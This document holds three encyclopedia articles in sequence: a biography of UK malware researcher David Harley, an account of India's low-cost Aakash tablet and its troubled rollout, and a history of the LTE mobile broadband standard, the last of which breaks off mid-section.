David Harley is an IT security researcher, author/editor and consultant living in the United Kingdom, known for his books on and research into malware, Mac security, anti-malware product testing and management of email abuse. Career After a checkered career that included spells in music, bar-work, work with the mentally handicapped, retail and the building trade, Harley entered the IT field in the late 1980s, working initially in administration at the Royal Free Hospital in London, and in 1989 went to work for the Imperial Cancer Research Fund (now merged into Cancer Research UK), where he held administrative and IT support roles and eventually moved into full-time security. In 2001 he joined the National Health Service where he ran the Threat Assessment Centre. After leaving the NHS in 2006 to work as an independent consultant, he worked closely with the security company ESET where between 2011 and 2018 he held the position of Senior Research Fellow, working with the Cyber Threat Analysis Center. In 2009 he was elected to the Board of Directors of the Anti-Malware Testing Standards Organization (AMTSO). He stood down in February 2012, when Righard Zwienenberg, president of AMTSO, joined ESET, as the AMTSO bylaws don't allow more than one Board member to represent the same AMTSO member entity. He ran the Mac Virus website, and formerly held an undefined executive role in AVIEN. He is a former Fellow of the British Computer Society: he explained in a blog article in 2014 that he was dropping his subscriptions to the BCS Institute and (ISC)2 (and therefore would no longer be entitled to continue using the acronyms CISSP, CITP and FBCS), and his reasons for so doing. In January 2019 he announced that he was no longer working with ESET and was reverting to his former career as a musician, but indicated that he was still available for one-off authoring and editing work. He subsequently contributed content, reviewing and translation for the English edition of the book Cyberdanger by Eddy Willems. Writing Harley was co-author (with Robert Slade and Urs Gattiker) of Viruses Revealed, and technical editor and principal author of The AVIEN Malware Defense Guide for the Enterprise. He has also contributed chapters to a number of other security-related books, and sometimes writes for specialist security publishers such as Virus Bulletin and Elsevier. He has often presented papers at specialist security conferences including Virus Bulletin, AVAR, and EICAR. Until the end of 2018 he blogged regularly for ESET, and on occasion for Infosecurity Magazine, SC Magazine, (ISC)2, SecuriTeam, Mac Virus, and Small Blue-Green World. His Geek Peninsula metablog lists many of his papers and articles. Other work Some recordings, miscellaneous prose and verse are posted to or linked from his personal blog page. Miscellaneous prose – some but not all connected to the security industry – is posted to the Miscellaneous Prose page. Family life Harley was born in Shropshire and educated at the Priory Grammar School for Boys, Shrewsbury. He hardly ever talks publicly about his private life, but a biographical article for Virus Bulletin, and the dedications page to Viruses Revealed indicate that he has a daughter. He lives with his third wife in Cornwall, in the UK. Bibliography (Contributed content and some editing and translation.) Volume 3, "E-Mail Threats and Vulnerabilities." Chapter 3: "Malicious Macs: Malware and the Mac." Chapter 4: "Malware Detection and the Mac." (Editor, technical editor, several chapters.) Co-wrote Chapter 5, "Botnet Detection: Tools and Techniques" with Jim Binkley. Volume 3, "E-Mail Threats and Vulnerabilities." Massmailers: New Threats Need Novel Anti-Virus Measures. Co-wrote Chapter 49, "Medical Records Security" with Paul Brusil. Revised Chapter 17 "Viruses and Worms", Chapter 18 "Trojans." Chapter 17 "Viruses and Worms", Chapter 18 "Trojans." Co-Author. Papers Harley published white papers, conference papers and presentations, and on-line articles with or on behalf of ESET between 2006 and 2018. Some previous and subsequent papers, articles and presentations are available from his Geek Peninsula blog. References External links —home page Living people Writers about computer security British writers British technology writers 1949 births People educated at The Priory Boys' Grammar School, Shrewsbury
21371926
https://en.wikipedia.org/wiki/Aakash%20%28tablet%29
Aakash (tablet)
Aakash a.k.a. Ubislate 7+, is an Android-based tablet computer promoted by the Government of India as part of an initiative to link 25,000 colleges and 400 universities in an e-learning program. It was produced by the British-Canadian company DataWind, and manufactured by the company, at a production center in Hyderabad. The tablet was officially launched as the Aakash in New Delhi on 5 October 2011. The Indian Ministry of Human Resource Development announced an upgraded second-generation model called Aakash 2 in April 2012. The Aakash was a low-cost tablet computer with a 7-inch touch screen, ARM 11 processor, and 256 MB RAM running under the Android 2.2 operating system. It had two universal serial bus (USB) ports and delivered high definition (HD) quality video. For applications; the Aakash had access to Getjar, an independent market, rather than the Android Market. Originally projected as a "$35 laptop", the device was to be sold to the Government of India and distributed to university students – initially at US$50 until further orders are received and projected eventually to achieve the target $35 price. A commercial version of Aakash was marketed as UbiSlate 7+ at a price of $60. The Aakash 2, code named UbiSlate 7C, was released on 11 November 2012. Etymology The device was initially called the Sakshat tablet, later changed to Aakash, which is derived from the Sanskrit word Akasha (Devanagari आकाश) with several related meanings such as empty space and outer space. The word in Hindi means "sky". History The aspiration to create a "Made in India" computer was first reflected in a prototype "Simputer" that was produced in small numbers. Bangalore-based CPSU, Bharat Electronics Ltd manufactured around 5,000 Simputers for Indian customers from 2002 to 2007. In 2011, Kapil Sibal announced an anticipated low-cost computing device to compete with the One Laptop per Child (OLPC) initiative, though intended for urban college students rather than the OLPC's rural, underprivileged students. A year later, the MHRD announced that the low-cost computer would be launched in six weeks. Nine weeks later, the MHRD showcased a tablet named "Aakash", not nearly what had been projected and at $60 USD rather than the projected $35. "NDTV" reported that the new low-cost tablet was considerably less able than the previously shown prototype and was going to cost about twice as much. While it was once projected as a laptop, the design has evolved into a tablet computer. At the inauguration of the National Mission on Education Program organized by the Union HRD Ministry in 2009, joint secretary N. K. Sinha had said that the computing device is 10 inches (which is around 25.5 cm) long and 5 inches (12.5 cm) wide and priced at around $30 USD. India's Human Resource Development Minister, Kapil Sibal, unveiled a prototype on 22 July 2010, which was later given out to 500 college students to collect feedback. The price of the device exhibited was projected at $35 USD, eventually to drop to $20 USD and ultimately to $10 USD. After the device was unveiled, OLPC chairman Nicholas Negroponte offered full access to OLPC technology at no cost to the Indian team. The tablet was shown on the television program "Gadget Guru" aired on NDTV in August 2010, when it was shown to have 256 MB RAM and 2 GB of internal flash-memory storage and demonstrated running the Android operating system featuring video playback, internal Wi-Fi and cellular data via an external 3G modem. The device was developed as part of the country's aim to link 25,000 colleges and 400 universities in an e-learning program. Originally projected as a "$35 laptop", the device was planned to be sold to the Government of India and distributed to university students – initially at $50 USD. until further orders are received and projected eventually to achieve the target price of $35 USD. A commercial version was eventually released online as the UbiSlate7 tablet PC at and the Ubislate7+ tablet PC at on 11 November 2012 with a plan to offer it with subsidized cost for students at . As of February 2012, DataWind had over 1,400,000 booking orders, but had only shipped 10,000 units which were 0.7% of booking orders. As of November 2012, many customers who booked their orders still had not received their computers and were offered refunds. Specifications As released on 5 October 2011, the Aakash features an overall size of 190.5 x 118.5 x 15.7 mm with a resistive touchscreen, a weight of , and using the Android 2.2 operating system with access to the proprietary marketplace Getjar (not the Android Market), developed by DataWind. The processor runs at 366 MHz; there is a graphics accelerator and high definition(HD) video coprocessor. The tablet has 256 MB RAM, a micro SD slot with a 2 GB Micro SD card (expandable up to 32 GB), two USB ports, a 3.5 mm audio output and input jack, a 2100 mAh battery, Wi-Fi capability, a browser developed by DataWind, and an internal cellular and Subscriber Identity Module (SIM) modem. Power consumption is 2 watts, and there is a solar charging option. The Aakash is designed to support various documents (DOC, DOCX, PPT, PPTX, XLS, XLSX, ODT, ODP, and PDF), image (PNG, JPG, BMP, and GIF), audio (MP3, AAC, AC3, WAV, and WMA) and video (MPEG2, MPEG4, AVI, and FLV) file formats and includes an application for access to YouTube video content. Development and testing Kapil Sibal has stated that a million devices would be made available to students in 2011. The devices will be manufactured at a cost of 1500 (€23) each, half of which will be paid by the government and half by the institutions that would use it. In January 2011, the company initially chose to build the Sakshat, HCL Infosystems, failed to provide evidence that they had at least 600 million ($12.2 million) in bank guaranteed funds, as required by the Indian government, which has allocated $6.5 million to the project. As a result, the government put the project out for bidding again. In June 2011, the HRD announced that it received a few samples from the production process, which are under testing. Also it mentions that each state in India provided 3000 samples for testing on their functionality, utility, and durability in field conditions. The Government of India announced that 10,000 (Sakshat) tablets will be delivered to schools and colleges by late June and over the next four months 90,000 more would be made available at a price of 2500 device. The government will subsidize the cost by about 50%, so a student would have to pay less than 1,500 for the device. Indian Ministry of Education is releasing educational videos in conjunction with IGNOU and at sakshat.ac.in. This preparation of content is meant for students with access to the Internet, India's first law-abiding Online Video Library. Hardware Development IIT-Rajasthan's specifications were 1.2 GHz CPU and 700 MB RAM. It wanted the tablet to work after steep falls and in Monsoon season, making the cost over Rs 5000. So the responsibility of drafting specifications will be shifted to IIT Mumbai, IIT Madras, and IIT Kanpur while PSUs are being considered for procurement of the Aakash Tablet. Aakash 2 could have the 1 GB RAM, Capacitive TouchScreen Panel and a front-facing camera of VGA Quality (0.3 MP), capable of capturing video, that was announced earlier by Kapil Sibal. This version of the tablet may be announced only after October 2012 because of low funds in procuring the raw material for assembling and also setting up of assembling plant at Noida and Coimbatore. The Govt. officials say that the tablet may not be realized due to the pressure from various institutes and meager support from the Indian Government in regard to the funds regarding the process of the tablet procurement and assembly of the same. 35% of hardware components were sourced from South Korea, 25% from China, 16% from the US, 16% from India, and 8% from other countries. Reception Problems such as low memory, frequent system freezes, poor sound quality, absence of support for all formats, and inability to install free software available online were also cited by users. Technical commentator Prasanto Roy criticized issues such as a low battery life, an insufficient 7" screen, and absence of training and support infrastructure, especially in rural areas. UbiSlate 7+ will be released by 2012. The producer has finalized the improvements of Aakash. After receiving feedback on the early release model from over 500 users from educational institutions, DataWind announced the next iteration that will have a new microprocessor of 700 MHz versus the original 366 MHz processor. This will improve the speed of the tablet and solve the existing problems of quick overheating, frequent system freeze, poor sound quality, absence of support for all formats, and the inability to install free online software. The amount of memory, storage, and USB ports will remain the same. On 16 December 2011, DataWind opened Aakash booking online in their official website at 2500 with one week delivery time and cash on delivery facility, and its upgraded version Ubislate 7+ was available for booking at 2999. On 19 December 2011, DataWind reported that the first phase of Aakash tablet had been sold out completely, just three days since it was opened for Online booking. UbiSlate 7+ production capacity of January, February, and March have already been sold. Now, April production is open for booking. By 3rd January 2012, 1.4 million orders had been received since the UbiSlate 7+ was put up for sale online. By the end of January 2012, booking orders for UbiSlate 7+ have crossed two million. By 13 April 2012, Datawind severed connection with its supplier Quad, further delaying the assembly of UbiSlate 7+. While Quad claims DataWind has not paid it, the Canadian company alleges that its former partner infringed its intellectual property rights by trying to sell directly to the Indian Institute of Technology (IIT) Rajasthan. In the November 2012 issue of PCQuest, some letters described Datawind to be a fraud company, and the users wanted to sue the company in consumer court. Plans On 26 April 2012, Datawind launched UbiSlate 7+ and Ubislate 7C tablet in physical stores at Delhi. Reliance Industries Limited (RIL) has announced the plan to launch LTE(4G) Tablet between 3500–5000, with low-cost Internet service. This tablet will be an upgraded version of Aakash developed by DataWind. Indian Govt. HRD has revealed that Aakash 2 will be announced in May 2012. Hindustan Computers Limited (HCL), Bharat Heavy Electricals Limited (BHEL), DataWind, Wishtel, and Telmoco Development Labs are Interested in bidding at the Aakash 2 contract auction. The low-cost Akash tablet is under trials in IIT Bombay and is being tested against the new specifications. The Indian government also hopes to produce Aakash for the export market. On a visit to Turkmenistan in September 2012, the Indian telecom Minister Kapil Sibal, suggested forming a joint venture company which may manufacture Aakash. In this joint venture, the Indian side would design the necessary hardware and software of the tablet, fulfilling the Turkmen side needs. Besides supplying the low-cost tablets, the joint venture company could market the product to other international markets. According to allegations made in the Hindustan Times, the Tuli brothers "may have" procured these devices off-the-shelf from manufacturers in China and sold them to the Indian government at the purchase price.Suneet Singh Tuli, CEO of DataWind, however, insisted that only the manufacture of the motherboards were subcontracted to Chinese manufacturers, following which the components were placed in DIY kits which DataWind assembled and sold to the Indian government HRD. Chinese manufacturers allege that they sold "ready-to-use" tablets to Datawind, and that they manufactured the touch screens as well. Tuli, however, insists that the touch screens were manufactured by DataWind in Canada. See also DataWind Aakash (Tablet Series) BSNL Pantel Tablet Nexus 7 Tablet Aakash 2 (Ubislate 7Ci) Simputer References External links Tablet computers Linux-based devices Android (operating system) devices Touchscreen portable media players Tablet computers introduced in 2011
19752979
https://en.wikipedia.org/wiki/LTE%20%28telecommunication%29
LTE (telecommunication)
In telecommunications, Long-Term Evolution (LTE) is a standard for wireless broadband communication for mobile devices and data terminals, based on the GSM/EDGE and UMTS/HSPA standards. It improves on those standards' capacity and speed by using a different radio interface and core network improvements. LTE is the upgrade path for carriers with both GSM/UMTS networks and CDMA2000 networks. Because LTE frequencies and bands differ from country to country, only multi-band phones can use LTE in all countries where it is supported. The standard is developed by the 3GPP (3rd Generation Partnership Project) and is specified in its Release 8 document series, with minor enhancements described in Release 9. LTE is also called 3.95G and has been marketed as "4G LTE" and "Advanced 4G"; but it does not meet the technical criteria of a 4G wireless service, as specified in the 3GPP Release 8 and 9 document series for LTE Advanced. The requirements were set forth by the ITU-R organisation in the IMT Advanced specification; but, because of market pressure and the significant advances that WiMAX, Evolved High Speed Packet Access, and LTE bring to the original 3G technologies, ITU later decided that LTE and the aforementioned technologies can be called 4G technologies. The LTE Advanced standard formally satisfies the ITU-R requirements for being considered IMT-Advanced. To differentiate LTE Advanced and WiMAX-Advanced from current 4G technologies, ITU has defined them as "True 4G". Overview LTE stands for Long Term Evolution and is a registered trademark owned by ETSI (European Telecommunications Standards Institute) for the wireless data communications technology and a development of the GSM/UMTS standards. However, other nations and companies do play an active role in the LTE project. The goal of LTE was to increase the capacity and speed of wireless data networks using new DSP (digital signal processing) techniques and modulations that were developed around the turn of the millennium. A further goal was the redesign and simplification of the network architecture to an IP-based system with significantly reduced transfer latency compared with the 3G architecture. The LTE wireless interface is incompatible with 2G and 3G networks, so that it must be operated on a separate radio spectrum. LTE was first proposed in 2004 by Japan's NTT Docomo, with studies on the standard officially commenced in 2005. In May 2007, the LTE/SAE Trial Initiative (LSTI) alliance was founded as a global collaboration between vendors and operators with the goal of verifying and promoting the new standard in order to ensure the global introduction of the technology as quickly as possible. The LTE standard was finalized in December 2008, and the first publicly available LTE service was launched by TeliaSonera in Oslo and Stockholm on December 14, 2009, as a data connection with a USB modem. The LTE services were launched by major North American carriers as well, with the Samsung SCH-r900 being the world's first LTE Mobile phone starting on September 21, 2010, and Samsung Galaxy Indulge being the world's first LTE smartphone starting on February 10, 2011, both offered by MetroPCS, and the HTC ThunderBolt offered by Verizon starting on March 17 being the second LTE smartphone to be sold commercially. In Canada, Rogers Wireless was the first to launch LTE network on July 7, 2011, offering the Sierra Wireless AirCard 313U USB mobile broadband modem, known as the "LTE Rocket stick" then followed closely by mobile devices from both HTC and Samsung. Initially, CDMA operators planned to upgrade to rival standards called UMB and WiMAX, but major CDMA operators (such as Verizon, Sprint and MetroPCS in the United States, Bell and Telus in Canada, au by KDDI in Japan, SK Telecom in South Korea and China Telecom/China Unicom in China) have announced instead they intend to migrate to LTE. The next version of LTE is LTE Advanced, which was standardized in March 2011. Services are expected to commence in 2013. Additional evolution known as LTE Advanced Pro have been approved in year 2015. The LTE specification provides downlink peak rates of 300 Mbit/s, uplink peak rates of 75 Mbit/s and QoS provisions permitting a transfer latency of less than 5 ms in the radio access network. LTE has the ability to manage fast-moving mobiles and supports multi-cast and broadcast streams. LTE supports scalable carrier bandwidths, from 1.4 MHz to 20 MHz and supports both frequency division duplexing (FDD) and time-division duplexing (TDD). The IP-based network architecture, called the Evolved Packet Core (EPC) designed to replace the GPRS Core Network, supports seamless handovers for both voice and data to cell towers with older network technology such as GSM, UMTS and CDMA2000. The simpler architecture results in lower operating costs (for example, each E-UTRA cell will support up to four times the data and voice capacity supported by HSPA). History 3GPP standard development timeline In 2004, NTT Docomo of Japan proposes LTE as the international standard. In September 2006, Siemens Networks (today Nokia Networks) showed in collaboration with Nomor Research the first live emulation of an LTE network to the media and investors. As live applications two users streaming an HDTV video in the downlink and playing an interactive game in the uplink have been demonstrated. In February 2007, Ericsson demonstrated for the first time in the world, LTE with bit rates up to 144 Mbit/s In September 2007, NTT Docomo demonstrated LTE data rates of 200 Mbit/s with power level below 100 mW during the test. In November 2007, Infineon presented the world's first RF transceiver named SMARTi LTE supporting LTE functionality in a single-chip RF silicon processed in CMOS In early 2008, LTE test equipment began shipping from several vendors and, at the Mobile World Congress 2008 in Barcelona, Ericsson demonstrated the world's first end-to-end mobile call enabled by LTE on a small handheld device. Motorola demonstrated an LTE RAN standard compliant eNodeB and LTE chipset at the same event. At the February 2008 Mobile World Congress: Motorola demonstrated how LTE can accelerate the delivery of personal media experience with HD video demo streaming, HD video blogging, Online gaming and VoIP over LTE running a RAN standard compliant LTE network & LTE chipset. Ericsson EMP (now ST-Ericsson) demonstrated the world's first end-to-end LTE call on handheld Ericsson demonstrated LTE FDD and TDD mode on the same base station platform. Freescale Semiconductor demonstrated streaming HD video with peak data rates of 96 Mbit/s downlink and 86 Mbit/s uplink. NXP Semiconductors (now a part of ST-Ericsson) demonstrated a multi-mode LTE modem as the basis for a software-defined radio system for use in cellphones. picoChip and Mimoon demonstrated a base station reference design. This runs on a common hardware platform (multi-mode / software defined radio) with their WiMAX architecture. In April 2008, Motorola demonstrated the first EV-DO to LTE hand-off handing over a streaming video from LTE to a commercial EV-DO network and back to LTE. In April 2008, LG Electronics and Nortel demonstrated LTE data rates of 50 Mbit/s while travelling at 110 km/h (68 mph). In November 2008, Motorola demonstrated industry first over-the-air LTE session in 700 MHz spectrum. Researchers at Nokia Siemens Networks and Heinrich Hertz Institut have demonstrated LTE with 100 Mbit/s Uplink transfer speeds. At the February 2009 Mobile World Congress: Infineon demonstrated a single-chip 65 nm CMOS RF transceiver providing 2G/3G/LTE functionality Launch of ng Connect program, a multi-industry consortium founded by Alcatel-Lucent to identify and develop wireless broadband applications. Motorola provided LTE drive tour on the streets of Barcelona to demonstrate LTE system performance in a real-life metropolitan RF environment In July 2009, Nujira demonstrated efficiencies of more than 60% for an 880 MHz LTE Power Amplifier In August 2009, Nortel and LG Electronics demonstrated the first successful handoff between CDMA and LTE networks in a standards-compliant manner In August 2009, Alcatel-Lucent receives FCC certification for LTE base stations for the 700 MHz spectrum band. In September 2009, Nokia Siemens Networks demonstrated world's first LTE call on standards-compliant commercial software. In October 2009, Ericsson and Samsung demonstrated interoperability between the first ever commercial LTE device and the live network in Stockholm, Sweden. In October 2009, Alcatel-Lucent's Bell Labs, Deutsche Telekom Innovation Laboratories, the Fraunhofer Heinrich-Hertz Institut and antenna supplier Kathrein conducted live field tests of a technology called Coordinated Multipoint Transmission (CoMP) aimed at increasing the data transmission speeds of LTE and 3G networks. In November 2009, Alcatel-Lucent completed first live LTE call using 800 MHz spectrum band set aside as part of the European Digital Dividend (EDD). In November 2009, Nokia Siemens Networks and LG completed first end-to-end interoperability testing of LTE. On December 14, 2009, the first commercial LTE deployment was in the Scandinavian capitals Stockholm and Oslo by the Swedish-Finnish network operator TeliaSonera and its Norwegian brandname NetCom (Norway). TeliaSonera incorrectly branded the network "4G". The modem devices on offer were manufactured by Samsung (dongle GT-B3710), and the network infrastructure with SingleRAN technology created by Huawei (in Oslo) and Ericsson (in Stockholm). TeliaSonera plans to roll out nationwide LTE across Sweden, Norway and Finland. TeliaSonera used spectral bandwidth of 10 MHz (out of the maximum 20 MHz), and Single-Input and Single-Output transmission. The deployment should have provided a physical layer net bit rates of up to 50 Mbit/s downlink and 25 Mbit/s in the uplink. Introductory tests showed a TCP goodput of 42.8 Mbit/s downlink and 5.3 Mbit/s uplink in Stockholm. In December 2009, ST-Ericsson and Ericsson first to achieve LTE and HSPA mobility with a multimode device. In January 2010, Alcatel-Lucent and LG complete a live handoff of an end-to-end data call between LTE and CDMA networks. In February 2010, Nokia Siemens Networks and Movistar test the LTE in Mobile World Congress 2010 in Barcelona, Spain, with both indoor and outdoor demonstrations. In May 2010, Mobile TeleSystems (MTS) and Huawei showed an indoor LTE network at "Sviaz-Expocomm 2010" in Moscow, Russia. MTS expects to start a trial LTE service in Moscow by the beginning of 2011. Earlier, MTS has received a license to build an LTE network in Uzbekistan, and intends to commence a test LTE network in Ukraine in partnership with Alcatel-Lucent. At the Shanghai Expo 2010 in May 2010, Motorola demonstrated a live LTE in conjunction with China Mobile. This included video streams and a drive test system using TD-LTE. As of 12/10/2010, DirecTV has teamed up with Verizon Wireless for a test of high-speed LTE wireless technology in a few homes in Pennsylvania, designed to deliver an integrated Internet and TV bundle. Verizon Wireless said it launched LTE wireless services (for data, no voice) in 38 markets where more than 110 million Americans live on Sunday, Dec. 5. On May 6, 2011, Sri Lanka Telecom Mobitel demonstrated 4G LTE for the first time in South Asia, achieving a data rate of 96 Mbit/s in Sri Lanka. Carrier adoption timeline Most carriers supporting GSM or HSUPA networks can be expected to upgrade their networks to LTE at some stage. A complete list of commercial contracts can be found at: August 2009: Telefónica selected six countries to field-test LTE in the succeeding months: Spain, the United Kingdom, Germany and the Czech Republic in Europe, and Brazil and Argentina in Latin America. On November 24, 2009: Telecom Italia announced the first outdoor pre-commercial experimentation in the world, deployed in Torino and totally integrated into the 2G/3G network currently in service. On December 14, 2009, the world's first publicly available LTE service was opened by TeliaSonera in the two Scandinavian capitals Stockholm and Oslo. On May 28, 2010, Russian operator Scartel announced the launch of an LTE network in Kazan by the end of 2010. On October 6, 2010, Canadian provider Rogers Communications Inc announced that Ottawa, Canada's national capital, will be the site of LTE trials. Rogers said it will expand on this testing and move to a comprehensive technical trial of LTE on both low- and high-band frequencies across the Ottawa area. On May 6, 2011, Sri Lanka Telecom Mobitel successfully demonstrated 4G LTE for the first time in South Asia, achieving a data rate of 96 Mbit/s in Sri Lanka. On May 7, 2011, Sri Lankan Mobile Operator Dialog Axiata PLC switched on the first pilot 4G LTE Network in South Asia with vendor partner Huawei and demonstrated a download data speed up to 127 Mbit/s. On February 9, 2012, Telus Mobility launched their LTE service initial in metropolitan areas include Vancouver, Calgary, Edmonton, Toronto and the Greater Toronto Area, Kitchener, Waterloo, Hamilton, Guelph, Belleville, Ottawa, Montreal, Québec City, Halifax and Yellowknife. Telus Mobility has announced that it will adopt LTE as its 4G wireless standard. Cox Communications has its first tower for wireless LTE network build-out. Wireless services launched in late 2009. In March 2019, the Global Mobile Suppliers Association reported that there were now 717 operators with commercially launched LTE networks (broadband fixed wireless access and or mobile). The following is a list of top 10 countries/territories by 4G LTE coverage as measured by OpenSignal.com in February/March 2019. For the complete list of all the countries/territories, see list of countries by 4G LTE penetration. LTE-TDD and LTE-FDD Long-Term Evolution Time-Division Duplex (LTE-TDD), also referred to as TDD LTE, is a 4G telecommunications technology and standard co-developed by an international coalition of companies, including China Mobile, Datang Telecom, Huawei, ZTE, Nokia Solutions and Networks, Qualcomm, Samsung, and ST-Ericsson. It is one of the two mobile data transmission technologies of the Long-Term Evolution (LTE) technology standard, the other being Long-Term Evolution Frequency-Division Duplex (LTE-FDD). While some companies refer to LTE-TDD as "TD-LTE" for familiarity with TD-SCDMA, there is no reference to that abbreviation anywhere in the 3GPP specifications. There are two major differences between LTE-TDD and LTE-FDD: how data is uploaded and downloaded, and what frequency spectra the networks are deployed in. While LTE-FDD uses paired frequencies to upload and download data, LTE-TDD uses a single frequency, alternating between uploading and downloading data through time. The ratio between uploads and downloads on a LTE-TDD network can be changed dynamically, depending on whether more data needs to be sent or received. LTE-TDD and LTE-FDD also operate on different frequency bands, with LTE-TDD working better at higher frequencies, and LTE-FDD working better at lower frequencies. Frequencies used for LTE-TDD range from 1850 MHz to 3800 MHz, with several different bands being used. The LTE-TDD spectrum is generally cheaper to access, and has less traffic. Further, the bands for LTE-TDD overlap with those used for WiMAX, which can easily be upgraded to support LTE-TDD. Despite the differences in how the two types of LTE handle data transmission, LTE-TDD and LTE-FDD share 90 percent of their core technology, making it possible for the same chipsets and networks to use both versions of LTE. A number of companies produce dual-mode chips or mobile devices, including Samsung and Qualcomm, while operators CMHK and Hi3G Access have developed dual-mode networks in Hong Kong and Sweden, respectively. History of LTE-TDD The creation of LTE-TDD involved a coalition of international companies that worked to develop and test the technology. China Mobile was an early proponent of LTE-TDD, along with other companies like Datang Telecom and Huawei, which worked to deploy LTE-TDD networks, and later developed technology allowing LTE-TDD equipment to operate in white spaces—frequency spectra between broadcast TV stations. Intel also participated in the development, setting up a LTE-TDD interoperability lab with Huawei in China, as well as ST-Ericsson, Nokia, and Nokia Siemens (now Nokia Solutions and Networks), which developed LTE-TDD base stations that increased capacity by 80 percent and coverage by 40 percent. Qualcomm also participated, developing the world's first multi-mode chip, combining both LTE-TDD and LTE-FDD, along with HSPA and EV-DO. Accelleran, a Belgian company, has also worked to build small cells for LTE-TDD networks. Trials of LTE-TDD technology began as early as 2010, with Reliance Industries and Ericsson India conducting field tests of LTE-TDD in India, achieving 80 megabit-per second download speeds and 20 megabit-per-second upload speeds. By 2011, China Mobile began trials of the technology in six cities. Although initially seen as a technology utilized by only a few countries, including China and India, by 2011 international interest in LTE-TDD had expanded, especially in Asia, in part due to LTE-TDD 's lower cost of deployment compared to LTE-FDD. By the middle of that year, 26 networks around the world were conducting trials of the technology. The Global LTE-TDD Initiative (GTI) was also started in 2011, with founding partners China Mobile, Bharti Airtel, SoftBank Mobile, Vodafone, Clearwire, Aero2 and E-Plus. In September 2011, Huawei announced it would partner with Polish mobile provider Aero2 to develop a combined LTE-TDD and LTE-FDD network in Poland, and by April 2012, ZTE Corporation had worked to deploy trial or commercial LTE-TDD networks for 33 operators in 19 countries. In late 2012, Qualcomm worked extensively to deploy a commercial LTE-TDD network in India, and partnered with Bharti Airtel and Huawei to develop the first multi-mode LTE-TDD smartphone for India. In Japan, SoftBank Mobile launched LTE-TDD services in February 2012 under the name Advanced eXtended Global Platform (AXGP), and marketed as SoftBank 4G (ja). The AXGP band was previously used for Willcom's PHS service, and after PHS was discontinued in 2010 the PHS band was re-purposed for AXGP service. In the U.S., Clearwire planned to implement LTE-TDD, with chip-maker Qualcomm agreeing to support Clearwire's frequencies on its multi-mode LTE chipsets. With Sprint's acquisition of Clearwire in 2013, the carrier began using these frequencies for LTE service on networks built by Samsung, Alcatel-Lucent, and Nokia. As of March 2013, 156 commercial 4G LTE networks existed, including 142 LTE-FDD networks and 14 LTE-TDD networks. As of November 2013, the South Korean government planned to allow a fourth wireless carrier in 2014, which would provide LTE-TDD services, and in December 2013, LTE-TDD licenses were granted to China's three mobile operators, allowing commercial deployment of 4G LTE services. In January 2014, Nokia Solutions and Networks indicated that it had completed a series of tests of voice over LTE (VoLTE) calls on China Mobile's TD-LTE network. The next month, Nokia Solutions and Networks and Sprint announced that they had demonstrated throughput speeds of 2.6 gigabits per second using a LTE-TDD network, surpassing the previous record of 1.6 gigabits per second. Features Much of the LTE standard addresses the upgrading of 3G UMTS to what will eventually be 4G mobile communications technology. A large amount of the work is aimed at simplifying the architecture of the system, as it transitions from the existing UMTS circuit + packet switching combined network, to an all-IP flat architecture system. E-UTRA is the air interface of LTE. Its main features are: Peak download rates up to 299.6 Mbit/s and upload rates up to 75.4 Mbit/s depending on the user equipment category (with 4×4 antennas using 20 MHz of spectrum). Five different terminal classes have been defined from a voice-centric class up to a high-end terminal that supports the peak data rates. All terminals will be able to process 20 MHz bandwidth. Low data transfer latencies (sub-5 ms latency for small IP packets in optimal conditions), lower latencies for handover and connection setup time than with previous radio access technologies. Improved support for mobility, exemplified by support for terminals moving at up to or depending on the frequency Orthogonal frequency-division multiple access for the downlink, Single-carrier FDMA for the uplink to conserve power. Support for both FDD and TDD communication systems as well as half-duplex FDD with the same radio access technology. Support for all frequency bands currently used by IMT systems by ITU-R. Increased spectrum flexibility: 1.4 MHz, 3 MHz, 5 MHz, 10 MHz, 15 MHz and 20 MHz wide cells are standardized. (W-CDMA has no option for other than 5 MHz slices, leading to some problems rolling-out in countries where 5 MHz is a commonly allocated width of spectrum so would frequently already be in use with legacy standards such as 2G GSM and cdmaOne.) Support for cell sizes from tens of metres radius (femto and picocells) up to radius macrocells. In the lower frequency bands to be used in rural areas, is the optimal cell size, having reasonable performance, and up to 100 km cell sizes supported with acceptable performance. In the city and urban areas, higher frequency bands (such as 2.6 GHz in EU) are used to support high-speed mobile broadband. In this case, cell sizes may be or even less. Support of at least 200 active data clients (connected users) in every 5 MHz cell. Simplified architecture: The network side of E-UTRAN is composed only of eNode Bs. Support for inter-operation and co-existence with legacy standards (e.g., GSM/EDGE, UMTS and CDMA2000). Users can start a call or transfer of data in an area using an LTE standard, and, should coverage be unavailable, continue the operation without any action on their part using GSM/GPRS or W-CDMA-based UMTS or even 3GPP2 networks such as cdmaOne or CDMA2000. Uplink and downlink Carrier aggregation. Packet-switched radio interface. Support for MBSFN (multicast-broadcast single-frequency network). This feature can deliver services such as Mobile TV using the LTE infrastructure, and is a competitor for DVB-H-based TV broadcast only LTE compatible devices receives LTE signal. Voice calls The LTE standard supports only packet switching with its all-IP network. Voice calls in GSM, UMTS and CDMA2000 are circuit switched, so with the adoption of LTE, carriers will have to re-engineer their voice call network. Four different approaches sprang up: Voice over LTE (VoLTE) Circuit-switched fallback (CSFB) In this approach, LTE just provides data services, and when a voice call is to be initiated or received, it will fall back to the circuit-switched domain. When using this solution, operators just need to upgrade the MSC instead of deploying the IMS, and therefore, can provide services quickly. However, the disadvantage is longer call setup delay. Simultaneous voice and LTE (SVLTE) In this approach, the handset works simultaneously in the LTE and circuit switched modes, with the LTE mode providing data services and the circuit switched mode providing the voice service. This is a solution solely based on the handset, which does not have special requirements on the network and does not require the deployment of IMS either. The disadvantage of this solution is that the phone can become expensive with high power consumption. Single Radio Voice Call Continuity (SRVCC) One additional approach which is not initiated by operators is the usage of over-the-top content (OTT) services, using applications like Skype and Google Talk to provide LTE voice service. Most major backers of LTE preferred and promoted VoLTE from the beginning. The lack of software support in initial LTE devices, as well as core network devices, however led to a number of carriers promoting VoLGA (Voice over LTE Generic Access) as an interim solution. The idea was to use the same principles as GAN (Generic Access Network, also known as UMA or Unlicensed Mobile Access), which defines the protocols through which a mobile handset can perform voice calls over a customer's private Internet connection, usually over wireless LAN. VoLGA however never gained much support, because VoLTE (IMS) promises much more flexible services, albeit at the cost of having to upgrade the entire voice call infrastructure. VoLTE will also require Single Radio Voice Call Continuity (SRVCC) in order to be able to smoothly perform a handover to a 3G network in case of poor LTE signal quality. While the industry has seemingly standardized on VoLTE for the future, the demand for voice calls today has led LTE carriers to introduce circuit-switched fallback as a stopgap measure. When placing or receiving a voice call, LTE handsets will fall back to old 2G or 3G networks for the duration of the call. Enhanced voice quality To ensure compatibility, 3GPP 